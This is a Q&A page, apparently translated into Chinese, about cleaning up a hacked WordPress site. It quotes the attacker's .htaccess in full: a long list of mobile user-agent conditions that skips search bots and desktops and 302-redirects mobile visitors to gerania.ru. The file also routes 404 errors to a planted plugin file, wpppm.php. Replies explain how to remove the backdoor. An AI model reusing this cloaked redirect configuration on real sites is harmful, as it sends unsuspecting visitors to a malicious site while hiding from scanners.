1. 首页
  2. 问答
  3. WordPress的网站后门 - 破解

WordPress的网站后门 - 破解

2014-01-26 34 views
0

我一直在试图清理一个已被“黑客入侵”的WordPress网站。WordPress的网站后门 - 破解

如果该网站在手机中打开,它将重定向到一个罗马尼亚网站。我已经看到了如何解决这个问题,因为它是在.htaccess:

########GET####### 
RewriteEngine on 
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} blac [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} cell [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} dang [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} doco [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} eric [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} inno [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} java [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} keji [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} leno [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} maui [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} mits [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} moto [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} newt [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} noki [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} palm [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} pana [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} pant [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} phil [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} play [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} port [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} prox [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} sage [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} sams [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} sany [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} send [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} seri [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} shar [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} siem [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} smal [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} smar [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} sony [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} symb [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} teli [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} voda [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} webc [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} xda [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} mini [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} wap [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} phone [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} ipod [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} iPod [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} android [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} Android [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} pda [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} Moby [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} Mobi [NC,OR] 
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC] 
RewriteCond %{HTTP_USER_AGENT} !bsd [NC] 
RewriteCond %{HTTP_USER_AGENT} !x11 [NC] 
RewriteCond %{HTTP_USER_AGENT} !unix [NC] 
RewriteCond %{HTTP_USER_AGENT} !macos [NC] 
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC] 
RewriteCond %{HTTP_USER_AGENT} !playstation [NC] 
RewriteCond %{HTTP_USER_AGENT} !google [NC] 
RewriteCond %{HTTP_USER_AGENT} !yandex [NC] 
RewriteCond %{HTTP_USER_AGENT} !bot [NC] 
RewriteCond %{HTTP_USER_AGENT} !libwww [NC] 
RewriteCond %{HTTP_USER_AGENT} !msn [NC] 
RewriteCond %{HTTP_USER_AGENT} !america [NC] 
RewriteCond %{HTTP_USER_AGENT} !avant [NC] 
RewriteCond %{HTTP_USER_AGENT} !download [NC] 
RewriteCond %{HTTP_USER_AGENT} !fdm [NC] 
RewriteCond %{HTTP_USER_AGENT} !maui [NC] 
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC] 
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC] 
RewriteRule ^(.*)$ http://gerania.ru [L,R=302] 



RewriteEngine on 
RewriteCond %{REQUEST_FILENAME} -f [OR] 
RewriteCond %{REQUEST_FILENAME} -d 
RewriteRule ^(.+) - [PT,L] 
RewriteRule ^(.+) index.php 
ErrorDocument 404 /web/wp-content/plugins/wpppm/wpppm.php

但问题是,还缺少在网站加载的内容,我无法找到被删除脚本内容(这发生在手机和台式机上)。

任何想法如何解决它?

我已经检查了这一切,没有运气: http://codex.wordpress.org/FAQ_My_site_was_hacked http://ottopress.com/2011/how-to-cope-with-a-hacked-site/

来源

2014-01-26 codek

+0

删除此htaccess,停用所有插件,单击WP管理面板中的保存固定链接。它会生成新的,干净的htaccess –

+4

采取wordpress全新安装,把它放在github回购,拿一个网站的副本,并把它放在同一个文件夹和更新回购,你会看到哪些网页已被改变;) – jycr753

+0

你可以通过一些插件或内置功能导出内容,并像@ jycr753所做的全新安装指出。 –

回答

1

走进的wp-content /插件和删除文件夹wpppm以及更新你的.htaccess文件。我今天遇到了这个。

来源

2014-02-11 00:17:25

+0

我相信我的网站上有同样的黑客攻击。但是我无法在我的插件中看到'wpppm'文件夹。但我收到电子邮件说该文件夹已被修改。有没有办法让黑客在FTP上隐藏我的文件和文件夹? –

+0

嘿,我知道这是旧的,但我刚刚遇到这个黑客,我想知道如果有人知道如何网站感染这样开始? – Erik

+0

从我做的研究来看,似乎黑客是通过Wordpress插件进入的。 –

相关问题

 相关问题